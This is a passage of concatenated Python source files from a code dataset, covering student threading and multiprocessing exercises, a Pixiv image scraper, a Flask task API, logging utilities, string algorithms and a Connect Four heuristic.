time.sleep(random.random())\r\nProducerThread().start()\r\nConsumerThread().start()\r\n\r\n\r\n\r\nimport multiprocessing\r\nimport time\r\nresult=[]\r\ndef sq(mylist):\r\n global result\r\n for num in mylist:\r\n result.append(num*num)\r\n print('result',result)\r\n time.sleep(1)\r\nif __name__=='__main__':\r\n mylist=[1,2,3,4,5,6,7,8,9,10]\r\n p1=multiprocessing.Process(target=sq,args=(mylist,))\r\n p1.start()\r\n p1.join()\r\n print('result',result)\r\n\r\n'''\r\n#import threading\r\nimport multiprocessing\r\ndef sq(mylist,result,square_sum):\r\n for index,num in enumerate(mylist):\r\n result[index]=num*num\r\n square_sum.value=sum(result)\r\n print('result',result[:])\r\n print('sum of sqaures',square_sum.value)\r\nif __name__==\"__main__\":\r\n mylist=[1,2,3,4,5,6,7,8,9,10]\r\n result=multiprocessing.Array('i',10)\r\n square_sum=multiprocessing.Value('i')\r\n p1=multiprocessing.Process(target=sq,args=(mylist,result,square_sum))\r\n p1.start()\r\n p1.join()\r\n print('main process',result[:])\r\n print('sum of sqaures',square_sum.value)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"SEM 5/Python Application Programming/MS_Teams Files/Unit 3/lock_prod_cons.py","file_name":"lock_prod_cons.py","file_ext":"py","file_size_in_byte":6730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300463184","text":"import threading\nimport pyaudio\nimport sys\nfrom array import array\nimport numpy as np\n\nclass Record(threading.Thread):\n\t'''Records internal audio and passes data to LAME object'''\n\n\tCHUNK_SIZE = 1024\n\tCHANNELS = 1\n\tRATE = 44100 / 2 # Frequency of output / 2 (it works, idk why)\n\tFORMAT = pyaudio.paInt16\n\n\tdef __init__(self, l):\n\t\t# Transcoder object\n\t\tself.lame = l\n\n\t\tprint(\"===IGNORE ERROR===\") # PyAudio complains about no JACK server, but still works\n\t\tself.p = pyaudio.PyAudio() # Initialize the PyAudio object\n\t\tprint(\"==================\")\n\n\t\t# Open audio stream\n\t\tself.stream = self.p.open(\n\t\t\tformat=self.FORMAT, \n\t\t\tchannels=self.CHANNELS, \n\t\t\trate=self.RATE, \n\t\t\tinput=True,\n\t\t\tframes_per_buffer=self.CHUNK_SIZE)\n\n\t\tsuper(Record, self).__init__()\n\n\tdef record(self, chunks):\n\t\t'''Record chunks each of size .\n\t\tReturns data array of signed shorts.'''\n\t \t# Array of PCM data values\n\t\tr = array('h') # h = signed short\n\t \n\t \t# Read chunks into array\n\t\tfor i in range(chunks):\n\t\t\td = self.stream.read(self.CHUNK_SIZE)\n\t\t\tdata = array('h', d)\n\t\t\tif sys.byteorder == 'big':\n\t\t\t\tdata.byteswap()\n\t\t\tr.extend(data)\n\n\t\treturn r\n\n\tdef __del__(self):\n\t\t'''Close PyAudio and stream objects.'''\n\t\tself.stream.stop_stream()\n\t\tself.stream.close()\n\t\tself.p.terminate()\n\t \n\tdef run(self, *args, **kwargs):\n\t\t'''Starts recording audio and passing it to LAME transcoder.'''\n\t\twhile True:\n\t\t\td = self.record(500)\n\t\t\td = np.array(d)\n\t\t\tself.lame.add_pcm(d)","sub_path":"Record.py","file_name":"Record.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"67702249","text":"from pixivpy3 import *\nfrom time import sleep\nfrom robobrowser import RoboBrowser\nfrom bs4 import BeautifulSoup\nimport MySQLdb, json, ulid, sys, io, re, os, sys\n\nconnection = MySQLdb.connect(\n host='localhost',\n user='root',\n db='pixiv_image_collect',\n # passeord='',\n charset='utf8'\n)\n\nf = open(\"./public/client.json\", \"r\")\nclient_info = json.load(f)\nf.close()\n\n# pixivpyのログイン処理\napi = PixivAPI()\napi.login(client_info[\"pixiv_id\"], client_info[\"password\"])\naapi = AppPixivAPI()\naapi.login(client_info[\"pixiv_id\"], client_info[\"password\"])\n\n# フォローユーザーの総数を取得\nself_info = aapi.user_detail(client_info[\"user_id\"])\nfollowing_users_num = self_info.profile.total_follow_users\n\n# フォローユーザー一覧ページのページ数を取得\nif(following_users_num%48 != 0):\n pages = (following_users_num//48)+1\nelse:\n pages = following_users_num//48\n\n#タグ除去用\np = re.compile(r\"<[^>]*?>\")\n# [jump:1]形式除去用\njump = re.compile(r\"\\[jump:.+\\]\")\n#ファイルエンコード設定用\ncharacter_encoding = 'utf_8'\n\n# Webスク���イパーのログイン処理\npixiv_url = 'https://www.pixiv.net'\nbrowser = RoboBrowser(parser='lxml', history=True)\nbrowser.open('https://accounts.pixiv.net/login')\nform = browser.get_forms('form', class_='')[0]\nform['pixiv_id'] = client_info[\"pixiv_id\"]\nform['password'] = client_info[\"password\"]\nbrowser.submit_form(form)\n\n# フォローユーザー一覧ページのURLを設定\ntarget_url = 'https://www.pixiv.net/bookmark.php?type=user&rest=show&p='\n\n# 全てのフォローユーザーのユーザIDを取得\n# 4935\ndel sys.argv[0]\nfollowing_users_id = sys.argv\n\n##### ダウンロード処理 #####\n# 絵師IDから絵師情報を取得\nfor user_id in following_users_id:\n\n # ユーザ情報(作品数、絵師名)を取得\n user_info_json = aapi.user_detail(int(user_id))\n total_illusts = user_info_json.profile.total_illusts\n total_manga = user_info_json.profile.total_manga\n illustrator_name = user_info_json.user.name\n\n # イラスト情報を取得(とりあえず300作品取得)\n works_info = api.users_works(int(user_id), page=1, per_page=300)\n\n saving_direcory_path = \"./public/pixiv_images/\"\n if not os.path.exists(saving_direcory_path + str(user_id)):\n os.mkdir(saving_direcory_path + str(user_id))\n else :\n continue\n\n saving_direcory_path += str(user_id)\n\n user_cursor = connection.cursor()\n user_cursor.execute(\n \"INSERT INTO user (user_id, user_name, account_name, saving_direcory) VALUES (%s, %s, %s, %s)\",\n (\n user_id,\n user_info_json.user.name,\n user_info_json.user.account,\n saving_direcory_path\n )\n )\n # connection.commit()\n\n # enumerate()を使うことでi:インデックス work_info:要素 でループ\n for i, work_info in enumerate(works_info.response):\n # 18禁はダメ\n if 'R-18' in work_info.tags:\n continue\n\n # ダウンロード\n work_title = work_info.title.replace(\"/\", \"-\") # '/'はPathとして扱われるため回避\n\n illust_cursor = connection.cursor()\n # tagの確認\n try:\n for tag_item in work_info.tags:\n tag_check_cursor = connection.cursor()\n tag_check_cursor.execute(\"SELECT tag_id FROM tag WHERE tag_name=%s\", [tag_item])\n\n tag_id = tag_check_cursor.fetchone()\n if tag_id is None:\n tag_id = str(ulid.new())\n illust_cursor.execute(\n \"INSERT INTO tag (tag_id, tag_name) VALUES (%s, %s)\",\n (\n tag_id,\n tag_item\n )\n )\n\n illust_cursor.execute(\n \"INSERT INTO illust_tag (illust_id, tag_id) VALUES (%s, %s)\",\n (\n work_info.id,\n tag_id\n )\n )\n\n if work_info.is_manga:\n # 漫画\n if not os.path.exists(saving_direcory_path + '/' + str(work_info.id)):\n os.mkdir(saving_direcory_path + '/' + str(work_info.id))\n\n manga_info = api.works(work_info.id)\n illust_name = str(ulid.new())\n for page_no in range(0, manga_info.response[0].page_count):\n page_info = manga_info.response[0].metadata.pages[page_no]\n aapi.download(page_info.image_urls.large, path=saving_direcory_path + '/' + str(work_info.id), name=illust_name + '_' + str(page_no) + \".jpg\")\n else:\n # イラスト\n illust_name = str(ulid.new())\n aapi.download(work_info.image_urls.large, path=saving_direcory_path, name=illust_name + \".jpg\")\n\n illust_cursor.execute(\n \"INSERT INTO illust (illust_id, user_id, title, url, caption, illust_name, views_count, favorited_count, create_date, update_date, page_count)\" +\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\",\n [\n work_info.id,\n user_id,\n work_title,\n work_info.image_urls.large,\n work_info.caption,\n illust_name,\n work_info.stats.views_count,\n work_info.stats.favorited_count.public + work_info.stats.favorited_count.private,\n work_info.created_time,\n work_info.reuploaded_time,\n work_info.page_count\n ]\n )\n connection.commit()\n sleep(1)\n except MySQLdb._exceptions.IntegrityError:\n connection.rollback()\n except PixivError:\n connection.rollback()\n\nprint(\"\\nThat\\'s all.\")\n\n# DELETE FROM illust;\n# DELETE FROM illust_tag;\n# DELETE FROM user;\n# DELETE FROM tag;\n","sub_path":"public/get_pixiv_illust.py","file_name":"get_pixiv_illust.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"343814439","text":"from z3 import *\ndef verifica_inteiro(n):\n # z3 solver\n\n s = Solver()\n\n aloc = {}\n for pombo in range(n): # cria as variáveis z3\n aloc[pombo] = Int(str(pombo))\n s.add(0 <= aloc[pombo], aloc[pombo] < n-1) # poleiro válido\n\n for pombo in aloc:\n for pombo2 in aloc:\n if pombo != pombo2:\n s.add(aloc[pombo] != aloc[pombo2])\n\n if s.check() == sat:\n m = s.model()\n print(m)\n return True\n else:\n return False\n\n\nfor n in range(2, 10):\n z = verifica_inteiro(n)\n print(z)\n","sub_path":"3ºAno/1ºSemestre/LC/aula2/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"192013051","text":"#\n#\tLogging.py\n#\n#\t(c) 2020 by Andreas Kraft\n#\tLicense: BSD 3-Clause License. See the LICENSE file for further details.\n#\n#\tWrapper for the logging sub-system. It provides simpler access as well\n#\tsome more usefull output rendering.\n#\n\n\"\"\"\tWrapper class for the logging subsystem. \"\"\"\n\nimport logging, logging.handlers, os, inspect, re, sys, datetime#\nfrom logging import StreamHandler\nfrom Configuration import Configuration\n\nlevelName = {\n\tlogging.INFO : 'ℹ️ I',\n\tlogging.DEBUG : '🐞 D',\n\tlogging.ERROR : '🔥 E',\n\tlogging.WARNING : '⚠️ W'\n\t# logging.INFO : 'INFO ',\n\t# logging.DEBUG : 'DEBUG ',\n\t# logging.ERROR : 'ERROR ',\n\t# logging.WARNING : 'WARNING'\n}\n\nclass\tLogging:\n\t\"\"\" Wrapper class for the logging subsystem. This class wraps the \n\t\tinitialization of the logging subsystem and provides convenience \n\t\tmethods for printing log, error and warning messages to a \n\t\tlogfile and to the console.\n\t\"\"\"\n\n\tlogger \t\t\t= None\n\tlogLevel \t\t\t= logging.INFO\n\tloggingEnabled\t\t= True\n\tenableFileLogging\t= True\n\n\t@staticmethod\n\tdef init():\n\t\t\"\"\"Init the logging system.\n\t\t\"\"\"\n\n\t\tif Logging.logger is not None:\n\t\t\treturn\n\t\tLogging.enableFileLogging \t= Configuration.get('logging.enableFileLogging')\n\t\tLogging.logLevel \t\t\t= Configuration.get('logging.level')\n\t\tLogging.loggingEnabled\t\t= Configuration.get('logging.enable')\n\t\tLogging.logger\t\t\t\t= logging.getLogger('logging')\n\n\t\t# Log to file only when file logging is enabled\n\t\tif Logging.enableFileLogging:\n\t\t\tlogfile = Configuration.get('logging.file')\n\t\t\tos.makedirs(os.path.dirname(logfile), exist_ok=True)# create log directory if necessary\n\t\t\tlogfp\t\t\t\t= logging.handlers.RotatingFileHandler( logfile,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmaxBytes=Configuration.get('logging.size'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbackupCount=Configuration.get('logging.count'))\n\t\t\tlogfp.setLevel(Logging.logLevel)\n\t\t\tlogfp.setFormatter(logging.Formatter('%(levelname)s %(asctime)s %(message)s'))\n\t\t\tLogging.logger.addHandler(logfp) \n\n\t\tLogging.logger.setLevel(Logging.logLevel)\n\n\t\n\n\t@staticmethod\n\tdef log(msg, withPath=True):\n\t\t\"\"\"Print a log message with level INFO.\n\t\t\"\"\"\n\t\tLogging._log(logging.INFO, msg, withPath)\n\n\n\t@staticmethod\n\tdef logDebug(msg, withPath=True):\n\t\t\"\"\"Print a log message with level DEBUG.\n\t\t\"\"\"\n\t\tLogging._log(logging.DEBUG, msg, withPath)\n\n\n\t@staticmethod\n\tdef logErr(msg, withPath=True):\n\t\t\"\"\"Print a log message with level ERROR.\n\t\t\"\"\"\n\t\timport CSE\n\t\tCSE.event.logError()\t# raise logError event\n\t\tLogging._log(logging.ERROR, msg, withPath)\n\n\n\t@staticmethod\n\tdef logWarn(msg, withPath=True):\n\t\t\"\"\"Print a log message with level WARNING.\n\t\t\"\"\"\n\t\timport CSE\n\t\tCSE.event.logWarning()\t# raise logWarning event\n\t\tLogging._log(logging.WARNING, msg, withPath)\n\n\n\t@staticmethod\n\tdef _log(level, msg, withPath):\n\t\ttry:\n\t\t\tif Logging.loggingEnabled and Logging.logLevel <= level:\n\t\t\t\tcaller = inspect.getframeinfo(inspect.stack()[2][0])\n\t\t\t\tif withPath:\n\t\t\t\t\tmsg = '(%s:%d) %s' % (os.path.basename(caller.filename), caller.lineno, msg)\n\t\t\t\t#print( \"(\" + time.ctime(time.time()) + \") \" + msg)\n\t\t\t\tprint('%s %s %s' % (levelName[level], datetime.datetime.now().isoformat(sep=' ', timespec='milliseconds'), msg))\n\t\t\t\tLogging.logger.log(level, msg)\n\t\texcept:\n\t\t\tpass\n\n\n#\n#\tRedirect handler to redirect other log output to our log\n#\n\nclass RedirectHandler(StreamHandler):\n\n\tdef __init__(self, topic):\n\t\tStreamHandler.__init__(self)\n\t\tself.topic = topic\n\n\tdef emit(self, record):\n\t\tmsg = '(%s) %s' % (self.topic, record.getMessage())\n\t\tmsg = re.sub(r'\\[.+?\\] ', '', msg) # clean up (remove superflous date and time)\n\t\tif record.levelno == logging.DEBUG:\n\t\t\tLogging.logDebug(msg, False)\n\t\telif record.levelno == logging.INFO:\n\t\t\tLogging.log(msg, False)\n\t\telif record.levelno == logging.WARNING:\n\t\t\tLogging.logWarn(msg, False)\n\t\telif record.levelName == logging.ERROR:\n\t\t\tLogging.logErr(msg, False)\n","sub_path":"acme/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367551740","text":"#!/usr/bin/python3\nimport statistics as stats\n\n\nclass Encoder:\n\n def __init__(self, unique_values, is_categorical):\n \"\"\"\n Constructor of an Encoder using one-hot-encoding\n \"\"\"\n\n self.is_categorical = is_categorical\n self.is_binary = len(unique_values) == 2\n self.unique_values = unique_values\n if not is_categorical and not self.is_binary: \n # Use the lower bound and the upper bound of standard deviation band\n # to one-hot-encode continuous value\n self.unique_values = self.__get_stdev_band(unique_values)\n\n\n def __get_stdev_band(self, unique_values):\n \"\"\"\n Get the lower bound and upper bound for the standard devaitation band\n for continuous value. \n \"\"\"\n\n mean = stats.mean(unique_values)\n stdev = stats.stdev(unique_values)\n return [mean - stdev, mean + stdev]\n\n\n def encode(self, value):\n \"\"\"\n Get one-hot encoding for a value based on the \n unique values in this encoder.\n\n Return a list of 0s except 1 at the index that matches the unique value\n index.\n \"\"\"\n\n encoded = []\n if self.is_binary:\n encoded.append(0 if value == self.unique_values[0] else 1)\n elif not self.is_categorical:\n lower_bound = self.unique_values[0]\n upper_bound = self.unique_values[1]\n encoded.append(1 if lower_bound < value < upper_bound else 0)\n else: \n for index in range(len(self.unique_values)):\n unique = self.unique_values[index]\n encoded.append(1 if value == unique else 0)\n\n return encoded","sub_path":"Project5/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"114160196","text":"from flask import Flask, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom flask.ext.mysql import MySQL\nimport db_info # Database login information\n\napp = Flask(__name__)\napi = Api(app)\n\nmysql = MySQL()\napp.config['MYSQL_DATABASE_USER'] = db_info.db_user\napp.config['MYSQL_DATABASE_PASSWORD'] = db_info.db_pw\napp.config['MYSQL_DATABASE_DB'] = db_info.db_name\napp.config['MYSQL_DATABASE_HOST'] = db_info.db_host\napp.config['MYSQL_USE_UNICODE'] = 'True'\nmysql.init_app(app)\n\nclass CreateUser(Resource):\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Gmail of user')\n args = parser.parse_args()\n\n _username = args['username']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('createUser', args=[_username])\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'User creation success' }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n return { 'error': str(e) }\n\nclass AddTask(Resource):\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Owner of task')\n parser.add_argument('deadline', type=str, help='Complete by date')\n parser.add_argument('description', type=str, help='Detail of task')\n args = parser.parse_args()\n\n _username = args['username']\n _deadline = args['deadline']\n _description = args['description']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('add_task', (_username, _deadline, _description))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'Successfully added task' }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Owner of task')\n parser.add_argument('deadline', type=str, help='Complete by date')\n parser.add_argument('description', type=str, help='Detail of task')\n args = parser.parse_args()\n return { 'error': str(e) }\n\nclass DeleteTask(Resource):\n def delete(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('taskid', type=int, help='Which task')\n args = parser.parse_args()\n\n _taskid = args['taskid']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('delete_task', args=[_taskid])\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'Task deleted successfully' }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n return { 'error': str(e) }\n\nclass CheckTask(Resource):\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('taskid', type=int, help='Task ID')\n parser.add_argument('status', type=int, help='Task status')\n args = parser.parse_args()\n\n _taskid = args['taskid']\n _status = args['status']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('check_task', (_taskid, _status))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'Checked task' + str(_status) }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n return { 'error': str(e) }\n\nclass GetTask(Resource):\n def get(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Owner of tasks')\n args = parser.parse_args()\n\n _username = args['username']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('get_all_tasks', args=[_username])\n data = cursor.fetchall()\n\n task_list = []\n none_list = []\n for task in data:\n if task[1] is None:\n i = { 'taskid': task[0],\n 'deadline': 'none',\n 'description': task[2],\n 'status': task[3] }\n none_list.append(i)\n else:\n i = { 'taskid': task[0],\n 'deadline': str(task[1]),\n 'description': task[2],\n 'status': task[3] }\n task_list.append(i)\n\n return task_list + none_list\n\n except Exception as e:\n return { 'error': str(e) }\n\n\napi.add_resource(CreateUser, '/CreateUser')\napi.add_resource(AddTask, '/AddTask')\napi.add_resource(DeleteTask, '/DeleteTask')\napi.add_resource(CheckTask, '/CheckTask')\napi.add_resource(GetTask, '/GetTask')\nif __name__ == '__main__':\n app.run()\n\n","sub_path":"server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"524623817","text":"import json\nimport logging\nfrom importlib import import_module\nfrom typing import Any, Dict, Type, Union\n\nfrom fluent.handler import FluentRecordFormatter\n\n\nclass VerboseFluentRecordFormatter(FluentRecordFormatter):\n def __init__(\n self,\n *,\n raise_on_format_error: bool = False,\n encoder_class: Union[str, Type[json.JSONEncoder]] = json.JSONEncoder,\n encoder_options: Dict[str, Any] = None,\n **kwargs: Any,\n ) -> None:\n self.raise_on_format_error = raise_on_format_error\n self.encoder_class = encoder_class\n self.encoder_options = encoder_options or {}\n super().__init__(**kwargs)\n\n @property\n def encoder_class(self) -> Type[json.JSONEncoder]:\n return self._encoder_class\n\n @encoder_class.setter\n def encoder_class(self, encoder_class: Union[str, Type[json.JSONEncoder]]) -> None:\n if isinstance(encoder_class, str):\n project_name_underscore, class_name = encoder_class.rsplit(\".\", 1)\n module = import_module(project_name_underscore)\n self._encoder_class = getattr(module, class_name)\n elif issubclass(encoder_class, json.JSONEncoder):\n self._encoder_class = encoder_class\n else:\n raise TypeError(f\"Cannot set encoder class {str(encoder_class)}\")\n\n @property\n def encoder(self) -> json.JSONEncoder:\n if not hasattr(self, \"_encoder\"):\n self._encoder = self.encoder_class(**self.encoder_options)\n return self._encoder\n\n def json_encode(self, obj: Any) -> Dict:\n return json.loads(self.encoder.encode(obj))\n\n def _format_msg_default(self, record, msg):\n return {\"message\": record.getMessage()}\n\n def _structuring(self, data, record):\n msg = record.msg\n\n if isinstance(msg, dict):\n self._add_dic(data, self.json_encode(msg))\n if \"message\" not in data:\n data[\"message\"] = \"\"\n elif isinstance(msg, str):\n self._add_dic(data, self._format_msg_default(record, msg))\n else:\n self._add_dic(data, {\"message\": self.json_encode(msg)})\n\n def format(self, record):\n try:\n data = super().format(record)\n\n if \"data\" in record.__dict__:\n data[\"data\"] = self.json_encode(record.__dict__[\"data\"])\n\n except (ValueError, TypeError):\n sentry_logger = logging.getLogger(\"sentry\")\n sentry_logger.exception(\"Unserializable data was given to logger\")\n\n if self.raise_on_format_error:\n raise\n\n record.hostname = self.hostname\n data = self._formatter(record)\n data[\n \"message\"\n ] = \"Logger ({}) is receiving non serializable data, please check sentry.\".format(\n record.name\n )\n\n return data\n","sub_path":"cornershop-backend-test/backend_test/logging_formatter.py","file_name":"logging_formatter.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"471741170","text":"import array\nimport time\n\ndef getShortestUniqueSubstring(arr,str):\n\theadIndex = 0\n\tresult = \"\"\n\tuniqueCounter = 0\n\tcountMap = Map()\n\n\t# Initialize countMap\n\tfor i in range(len(arr)):\n\t\tcountMap.setValueOf(arr[i],0)\n\n\t#scan string\n\tfor tailIndex in range(len(str)):\n\t\ttailChar = str[tailIndex]\n\t\t\n\t\t#Skip all the characters not in arr\n\t\tif countMap.keyExists(tailChar) == False:\n\t\t\tcontinue\n\t\t\n\t\ttailCount = countMap.getValueOf(tailChar)\n\t\tif tailCount == 0:\n\t\t\tuniqueCounter = uniqueCounter + 1\n\n\t\tcountMap.setValueOf(tailChar, tailCount + 1)\n\n\t\t# push head forward\n\t\twhile uniqueCounter == len(arr):\n\t\t\ttempLength = tailIndex - headIndex + 1\n\t\t\tif tempLength == len(arr):\n\t\t\t\t#return a substring of str from\n\t\t\t\t# headIndex to tailIndex(inclusive)\n\t\t\t\treturn str[headIndex:tailIndex+1]\n\n\t\t\tif result == \"\" or tempLength < len(result):\n\t\t\t\t#return a substring of str from\n\t\t\t\t# headIndex to tailIndex(inclusive)\n\t\t\t\tresult = str[headIndex:tailIndex+1]\n\n\t\t\theadChar = str[headIndex]\n\n\t\t\tif countMap.keyExists(headChar):\n\t\t\t\theadCount = countMap.getValueOf(headChar) -1\n\t\t\tif headCount == 0:\n\t\t\t\tuniqueCounter = uniqueCounter - 1\n\t\t\tcountMap.setValueOf(headChar, headCount)\n\n\t\t\theadIndex = headIndex + 1\n\n\treturn result\nclass Map:\n\t\n\tHashTable = {}\n\t\n\tdef getValueOf(self,char):\n\t\treturn self.HashTable[char]\n\t\n\tdef setValueOf(self,char,int):\n\t\tself.HashTable[char] = int\n\n\tdef keyExists(self,char):\n\t\treturn char in self.HashTable.keys()\n\nif __name__ == \"__main__\":\n\tarr = array.array('u',['a','b','c'])\n\tstr = \"abdaaabanc\"\n\t\n\tprint(getShortestUniqueSubstring(arr,str))\n","sub_path":"getShortestUniqueSubstring4.py","file_name":"getShortestUniqueSubstring4.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"248472833","text":"def uniqueCharacters(str): \n \n # Using sorting \n sorted(str) \n \n for i in range(len(str)-1): \n \n # if at any time, 2 adjacent \n # elements become equal, \n # return false \n if (str[i] == str[i + 1]) : \n return False\n \n return True\n \n\nstr= input(\"enter your string:\")\n \nif (uniqueCharacters(str)) : \n print(\"The String\",str,\"has all unique characters\\n\") \n \nelse : \n print(\"The String\",str,\"has duplicate characters\\n\") \n","sub_path":"an algorithm to determine if a string has all unique characters.py","file_name":"an algorithm to determine if a string has all unique characters.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"311620468","text":"import os\n\nfrom MasterUI.UserInteraction import*\nclass ScenarioUserInteraction(UserInteraction):\n def run(self, options):\n input_checker = InputChecker()\n console_input = ConsoleInput()\n response = input_checker.InputCheck(console_input.choice(), options)\n if (response != 0 and response != 1):\n response.run()\n elif response == 0:\n Flow.quit()\n else:\n cprint(\"Command not understood, please retype\", 'blue', attrs=['bold'])\n self.run(options)\n\nclass PathChecker():\n def check_path(self, dir_path):\n if os.path.exists(dir_path):\n return 1\n else:\n return 0\n\nclass UserPath():\n def __init__(self):\n self.path_check = PathChecker()\n self.console_input = ConsoleInput()\n\n def check(self):\n self.choice =self.console_input.choice()\n if self.path_check.check_path(self.choice):\n return self.choice\n else:\n cprint(\"Path not exists. Please retype\", 'blue', attrs=['bold'])\n self.check()\n return 0\n\n def run(self):\n cprint(\"Please type a path to place where you want to make your project\", attrs=['bold'])\n return self.check()","sub_path":"MasterProject/InsideUserHandler.py","file_name":"InsideUserHandler.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645792948","text":"import games\n\n\ndef h1(state, player):\n horizontales = 0\n verticales = 0\n diagonales = 0\n\n if not state.utility == 0:\n if player == 'X':\n return state.utility * 10000\n else:\n return -state.utility * 10000\n for x in range(1, 8):\n for y in range(1, 7):\n if ((x, y)) in games.ConnectFour().legal_moves(state):\n equis = x\n ygriega = y\n horizontales = horizontales + chorizontales(state, player, equis, ygriega)\n verticales = verticales + cverticales(state, player, equis, ygriega)\n diagonales = diagonales + cdiagonales(state, player, equis, ygriega)\n\n return horizontales + verticales + diagonales\n\n\ndef chorizontales(state, player, equis, ygriega):\n suma = 0\n vectores = [[1, 2, 3, 4], [2, 3, 4, 5], [3, 4, 5, 6], [4, 5, 6, 7]]\n for z in range(0, 4):\n if equis in vectores[z]:\n suma = suma + valor(state, player, equis, ygriega, vectores[z])\n\n return suma\n\n\ndef valor(state, player, equis, ygriega, vector):\n count = 0\n rcount = 0\n for x in range(0, 4):\n if equis == vector[x]:\n if player == 'X':\n count = count + 10\n rcount = 0\n else:\n count = 0\n rcount = rcount + 10\n continue\n if state.board.get((vector[x], ygriega)) == 'X':\n count = count + 10\n rcount = 0\n if state.board.get((vector[x], ygriega)) == '.':\n count = count + 1\n rcount = rcount + 1\n if state.board.get((vector[x], ygriega)) == 'O':\n count = 0\n rcount = rcount + 10\n ##if (count == 0 or rcount == 0) and x >= 6:\n ##return 0\n if player == 'O':\n return rcount - count\n return count - rcount\n\n\ndef cverticales(state, player, equis, ygriega):\n count = 0\n rcount = 0\n for y in range(1, 7):\n if ygriega == y:\n if player == 'X':\n count = count + 10\n rcount = 0\n else:\n count = 0\n rcount = rcount + 10\n continue\n if state.board.get((equis, y)) == 'X':\n count = count + 10\n rcount = 0\n if state.board.get((equis, y)) == '.':\n count = count + 1\n rcount = rcount + 1\n if state.board.get((equis, y)) == 'O':\n count = 0\n rcount = rcount + 10\n ##if (count ==0 or rcount ==0) and y > 4:\n ## return 0\n if player == 'O':\n return rcount - count\n return count - rcount\n\n\ndef cdiagonales(state, player, equis, ygriega):\n seguidas = 0\n rseguidas = 0\n count = 0\n rcount = 0\n\n x = equis - 5\n y = ygriega - 5\n while x < 8 and y < 7:\n if x < 1 or y < 1:\n x = x + 1\n y = y + 1\n continue\n if state.board.get(x, y) == 'X':\n seguidas = seguidas + 1\n rseguidas = 0\n count = count + 10\n rcount = 0\n if state.board.get(x, y) == 'O':\n seguidas = 0\n rseguidas = rseguidas + 1\n count = 0\n rcount = rcount + 10\n if state.board.get(x, y) == '.':\n count = count + 1\n rcount = rcount + 1\n x = x + 1\n y = y + 1\n\n aseguidas = 0\n arseguidas = 0\n x = equis + 5\n y = ygriega - 5\n while x > 0 and y < 7:\n if x == equis and y == ygriega:\n if player == 'X':\n aseguidas = aseguidas + 1\n arseguidas = 0\n elif player == 'O':\n arseguidas = arseguidas + 1\n aseguidas = 0\n if x > 7 or y < 1:\n x = x + 1\n y = y + 1\n continue\n if state.board.get(x, y) == 'X':\n aseguidas = aseguidas + 1\n arseguidas = 0\n count = count + 10\n rcount = 0\n if state.board.get(x, y) == 'O':\n aseguidas = 0\n arseguidas = arseguidas + 1\n count = 0\n rcount = rcount + 10\n if state.board.get(x, y) == '.':\n count = count + 1\n rcount = rcount + 1\n x = x - 1\n y = y + 1\n\n if player == 'O':\n if rseguidas == 3 or arseguidas == 3:\n rseguidas = rseguidas + 1000\n return (rcount - count) + rseguidas\n if seguidas == 3 or aseguidas == 3:\n aseguidas += 1000\n return (count - rcount) + 